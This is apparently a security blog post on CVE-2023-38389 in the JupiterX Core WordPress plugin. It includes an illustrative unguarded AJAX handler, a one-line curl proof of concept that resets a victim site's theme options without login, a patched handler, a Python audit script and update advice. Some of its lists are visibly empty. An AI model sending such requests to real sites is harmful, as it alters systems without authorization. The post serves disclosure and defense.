CVE-2023-38389 - Exploiting Incorrect Authorization in Artbees JupiterX Core WordPress Plugin
CVE-2023-38389 is a recent security vulnerability that grabbed the attention of WordPress admins and security folks. It targets the popular *JupiterX Core* plugin by Artbees, specifically versions *n/a* through *3.3.8*. The issue? Incorrect authorization allows anyone, even unauthenticated users, to access and execute plugin functionality that should be locked behind login or specific user roles. In simple words: a door that should be locked, left wide open.
This post goes deep into what this CVE is, how it can be exploited (with a code snippet), and why you must act if you’re running the affected plugin version.
What’s the Problem? (Vulnerability Summary)
JupiterX Core is part of the JupiterX WordPress theme ecosystem, installed on thousands of websites. In versions up to 3.3.8, the plugin contains critical functions—like AJAX handlers, REST endpoints, or internal features—that aren't properly protected by WordPress’s role and capability checks.
Incorrect Authorization means the plugin fails to check whether a visitor is allowed to perform certain actions. An attacker can use this bug to interact with privileged plugin features, potentially leading to:
Exploit Walkthrough
Let's look at how an attacker could exploit this using a realistic example. In real-world reports, some AJAX handlers in JupiterX Core lack proper permission checks.
Suppose the plugin registers the following AJAX action:

```php
// Hook for logged-in users ...
add_action('wp_ajax_jupiterx_core_reset_options', 'jupiterx_core_reset_options_callback');
// ... and the same callback for unauthenticated visitors (nopriv)
add_action('wp_ajax_nopriv_jupiterx_core_reset_options', 'jupiterx_core_reset_options_callback');

function jupiterx_core_reset_options_callback() {
    // Should only be accessible by admin!
    jupiterx_reset_theme_options_to_default();
    wp_send_json_success('Options reset!');
}
```
What's wrong?
Both logged-in *and* non-logged-in users (wp_ajax_nopriv_*) can access jupiterx_core_reset_options_callback. There’s *no* permission check—so an attacker can reset the theme’s settings by just sending an AJAX request.
Here’s a simple proof-of-concept using curl:

```bash
curl -X POST "https://victimsite.com/wp-admin/admin-ajax.php" \
  -d "action=jupiterx_core_reset_options"
```
If exploited, the site theme’s settings go right back to default—*without* even needing to log in.
More Technical Details
While the actual vulnerable function or endpoint might differ, these bugs often pop up in one of two forms:
Safe code should always check user permissions:

```php
function jupiterx_core_reset_options_callback() {
    // Capability check: only users allowed to manage options may reset them
    if (!current_user_can('manage_options')) {
        wp_send_json_error('Unauthorized', 403);
        return;
    }
    jupiterx_reset_theme_options_to_default();
    wp_send_json_success('Options reset!');
}
```
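As an added example (not code from the original post or from Artbees), here is a small Python audit script that applies the rule above mechanically: it scans a PHP source file for wp_ajax_nopriv_ registrations and flags callbacks whose body contains none of the usual WordPress guard calls. The PHP it scans is a constructed sample, and the guard list and brace-walking body extraction are heuristics, not a full PHP parser.

```python
import re

# Constructed sample of a plugin file (not real JupiterX Core source): the
# first nopriv handler is unguarded, the second checks a capability first.
SAMPLE_PHP = """<?php
add_action('wp_ajax_jupiterx_core_reset_options', 'jupiterx_core_reset_options_callback');
add_action('wp_ajax_nopriv_jupiterx_core_reset_options', 'jupiterx_core_reset_options_callback');
function jupiterx_core_reset_options_callback() {
    jupiterx_reset_theme_options_to_default();
    wp_send_json_success('Options reset!');
}
add_action('wp_ajax_nopriv_jupiterx_core_export', 'jupiterx_core_export_cb');
function jupiterx_core_export_cb() {
    if (!current_user_can('manage_options')) { wp_send_json_error('Unauthorized', 403); return; }
    wp_send_json_success(array('exported' => true));
}
"""

# add_action('wp_ajax_nopriv_<action>', '<callback>') registrations
NOPRIV_RE = re.compile(
    r"add_action\(\s*['\"]wp_ajax_nopriv_(\w+)['\"]\s*,\s*['\"](\w+)['\"]")
# Calls whose presence suggests an authorization or nonce gate (heuristic list)
GUARD_CALLS = ("current_user_can(", "check_ajax_referer(", "wp_verify_nonce(")


def function_body(src, name):
    """Return the text between the braces of `function name(...) {...}`, or None."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(src) and depth:          # walk to the matching closing brace
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]


def find_unchecked_nopriv_handlers(src):
    """Return (action, callback) pairs reachable without login and lacking a guard."""
    flagged = []
    for action, callback in NOPRIV_RE.findall(src):
        body = function_body(src, callback)
        # A missing body means the callback lives elsewhere: flag it for manual review
        if body is None or not any(call in body for call in GUARD_CALLS):
            flagged.append((action, callback))
    return flagged


if __name__ == "__main__":
    for action, callback in find_unchecked_nopriv_handlers(SAMPLE_PHP):
        print(f"REVIEW: wp_ajax_nopriv_{action} -> {callback}() has no guard call")
```

Flagged handlers need human review rather than automatic rejection: an intentionally public read-only endpoint will be listed too, and handlers registered only on wp_ajax_ (logged-in users) still need their own capability checks, as the safe version above shows.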
Any WordPress site running JupiterX Core *up to* version 3.3.8.
- Hosting type makes no difference: VPS, dedicated and shared hosting are all vulnerable.
- Sites with custom roles/users: at even greater risk, since they depend on exactly the access controls this bug bypasses.
What Should You Do?
Step 1: Immediately update JupiterX Core to the latest version.
Step 2: Review all admin users, especially if your site shows odd behavior.
Step 3: Consider additional hardening like a WordPress firewall (e.g. Wordfence), which can block suspicious AJAX or REST requests.
Original References & Further Reading
- WordPress Plugin Vulnerabilities: CVE-2023-38389
- NVD - CVE-2023-38389 Entry
- JupiterX Core Plugin - WordPress.org
- WPScan - JupiterX Core Incorrect Authorization
Final Thoughts
CVE-2023-38389 is a textbook case of what can go wrong when plugins skip user role checks. Even plugins with thousands of installs and active support can have these holes. If you use JupiterX Core, update now, audit your site, and make sure all your plugins do *proper* capability checks.
> Stay secure—always code (or install) defensively. 🚧
Timeline
Published on: 06/21/2024 16:15:11 UTC
Last modified on: 06/24/2024 19:13:48 UTC